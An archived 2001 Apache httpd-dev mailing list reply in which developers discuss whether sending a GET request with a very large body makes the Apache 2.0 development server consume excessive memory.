httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Jon Travis <jtra...@covalent.net>
Subject Re: More Dos -- Large GETs
Date Tue, 30 Oct 2001 23:48:48 GMT
On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> Jon Travis <jtravis@covalent.net> writes:
> 
> > It's possible to make Apache eat up all available memory on a system
> > by sending a GET with a large Content-Length (like several hundred MB),
> > and then sending that content.  This is as of HEAD about 5 minutes ago.
> 
> Maybe the problem is your client implementation?  You didn't by any
> chance get a mongo buffer to hold the request body did you?
> 
> I just sent a GET w/ 500,000,000-byte body and didn't suffer.
> 
> strace showed that server process was pulling in 8K at a time...  lots
> of CPU between client and server but no swap fest.

Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
times.  It was the httpd process which was growing, not my test program.
This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.

-- Jon


Mime
View raw message